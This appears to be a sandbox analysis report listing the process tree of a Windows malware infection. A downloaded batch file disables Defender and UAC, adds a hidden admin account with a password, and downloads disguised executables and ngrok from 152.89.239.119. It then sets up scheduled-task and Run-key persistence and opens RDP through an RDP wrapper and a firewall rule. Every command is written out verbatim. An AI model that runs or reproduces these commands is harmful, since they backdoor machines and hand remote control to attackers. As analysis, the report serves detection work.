"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://152.89.239.119
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff0d9e46f8,0x7fff0d9e4708,0x7fff0d9e4718
  2⤵
  PID:4996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
  2⤵
  PID:3104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
  2⤵
  PID:5116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
  2⤵
  PID:320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
  2⤵
  PID:8
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
  2⤵
  PID:712
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
  2⤵
  PID:4356
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
  2⤵
  PID:2412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
  2⤵
  PID:3196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
  2⤵
  PID:4844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1
  2⤵
  PID:2016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1872 /prefetch:1
  2⤵
  PID:2736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
  2⤵
  PID:3860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1756 /prefetch:1
  2⤵
  PID:368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
  2⤵
  PID:1768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
  2⤵
  PID:5108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6128 /prefetch:8
  2⤵
  PID:3164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
  2⤵
  PID:1696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2736 /prefetch:1
  2⤵
  PID:640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
  2⤵
  PID:3720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1
  2⤵
  PID:4948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2296 /prefetch:1
  2⤵
  PID:4528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3020 /prefetch:1
  2⤵
  PID:2880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:1
  2⤵
  PID:3808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
  2⤵
  PID:4824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:1
  2⤵
  PID:3136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
  2⤵
  PID:3316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1
  2⤵
  PID:4884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6592 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\xdr.bat" "
  2⤵
  PID:772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -windowstyle hidden Add-MpPreference -ExclusionPath 'C:'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Add-MpPreference -ExclusionPath 'c:\'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3380
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Add-MpPreference -ExclusionPath 'C:\programdata\Windata'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:320
- - C:\Windows\system32\net.exe
    net user t1 Raed12346@@ /add
    3⤵
    PID:5000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user t1 Raed12346@@ /add
      4⤵
      PID:4564
- - C:\Windows\system32\net.exe
    net localgroup administrators t1 /add
    3⤵
    PID:4504
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators t1 /add
      4⤵
      PID:832
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v t1 /t REG_DWORD /d 0 /f
    3⤵
    - Hide Artifacts: Hidden Users
    PID:3740
- - C:\Windows\system32\net.exe
    net user t1 /active:no
    3⤵
    PID:1120
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user t1 /active:no
      4⤵
      PID:1632
- - C:\Windows\system32\net.exe
    net user t1 /active:yes
    3⤵
    PID:4916
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user t1 /active:yes
      4⤵
      PID:912
- - C:\Windows\system32\ReAgentc.exe
    reagentc.exe /disable
    3⤵
    - Drops file in System32 directory
    - Drops file in Windows directory
    PID:3932
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f
    3⤵
    PID:4824
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f
    3⤵
    PID:464
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v LockScreenToastEnabled /t REG_DWORD /d 0 /f
    3⤵
    PID:4068
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\MSEdge" /v Enabled /t REG_DWORD /d 0 /f
    3⤵
    PID:2920
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f
    3⤵
    PID:4816
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f
    3⤵
    PID:4700
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4908
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f
    3⤵
    PID:3360
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    PID:2352
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v TamperProtection /t REG_DWORD /d "1" /f
    3⤵
    PID:852
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3164
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/ngrok.yml','C:\Users\Admin\AppData\Local\ngrok\ngrok.yml')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/111.jpg','C:\ProgramData\Windata\smhost.exe')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2528
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/222.jpg','C:\ProgramData\Windata\srlhost.exe')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/x.jpg','C:\ProgramData\Windata\winlogin.exe')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/WindowsUpdate.jpg','C:\ProgramData\Windata\WindowsUpdate.exe')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/ngrok.zip','C:\ProgramData\Windata\ngrok.zip')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1456
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Expand-Archive "ngrok.zip" -DestinationPath "."
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/auto-install-hrdp.bat','C:\ProgramData\Windata\installer.bat')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3384
- - C:\Windows\system32\attrib.exe
    attrib +s +h C:\programdata\Windata
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4764
- - C:\Windows\system32\attrib.exe
    attrib +s +h C:\programdata\Windata\*.*
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4044
- - C:\Windows\system32\attrib.exe
    attrib -s +h *.bat
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4908
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn WindowsPowerup /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4416
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "WindowsPowerup_OnLogon" /ru "Admin" /sc onlogon /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:828
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn WindowsUpdate /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\smhost.exe" /f /it
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2132
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "WindowsUpdate_OnLogon" /ru "Admin" /sc onlogon /RL HIGHEST /tr "C:\ProgramData\Windata\smhost.exe" /f /it
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4500
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn Winlogo /ru "Admin" /sc minute /mo 15 /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2352
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "Winlogo_OnLogon" /ru "Admin" /sc onlogon /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:60
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn WindowsUp /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3328
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "WindowsUp_OnLogon" /ru "Admin" /sc onlogon /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3192
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsPowerup" /t REG_SZ /F /D "C:\ProgramData\Windata\srlhost.exe"
    3⤵
    - Adds Run key to start application
    PID:2528
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "winlogo" /t REG_SZ /F /D "C:\ProgramData\Windata\winlogin.exe"
    3⤵
    - Adds Run key to start application
    PID:852
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdate" /t REG_SZ /F /D "C:\ProgramData\Windata\smhost.exe"
    3⤵
    - Adds Run key to start application
    PID:2604
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdatez" /t REG_SZ /F /D "C:\ProgramData\Windata\WindowsUpdate.exe"
    3⤵
    - Adds Run key to start application
    PID:4348
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn Winupdate_Time /ru "Admin" /sc minute /mo 15 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:832
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:2736
- - C:\Windows\system32\schtasks.exe
    schtasks /run /tn winlogo
    3⤵
    PID:1576
- - C:\Windows\system32\schtasks.exe
    schtasks /run /tn WindowsUp
    3⤵
    PID:4764
- - C:\Windows\system32\schtasks.exe
    schtasks /run /tn WindowsPowerup
    3⤵
    PID:4416
- - C:\Windows\system32\schtasks.exe
    schtasks /run /tn WindowsUpdate
    3⤵
    PID:4500
- - C:\Windows\system32\attrib.exe
    attrib -s +h *.bat
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3704
- - C:\Windows\system32\cmd.exe
    cmd /C C:\ProgramData\Windata\installer.bat
    3⤵
    - Drops file in Program Files directory
    PID:3328
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/hrdp/hrdp.zip','C:\ProgramData\Windata\hrdp.zip')
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4760
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell Expand-Archive "C:\ProgramData\Windata\hrdp.zip" -DestinationPath "C:\ProgramData\Windata\hrdp"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4708
  - - C:\Windows\system32\cmd.exe
      cmd /C C:\ProgramData\Windata\hrdp\install.bat
      4⤵
      PID:4100
    - - C:\ProgramData\Windata\hrdp\RDPWInst.exe
        
        "C:\ProgramData\Windata\hrdp\RDPWInst" -i -o
        5⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2592
      - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5468
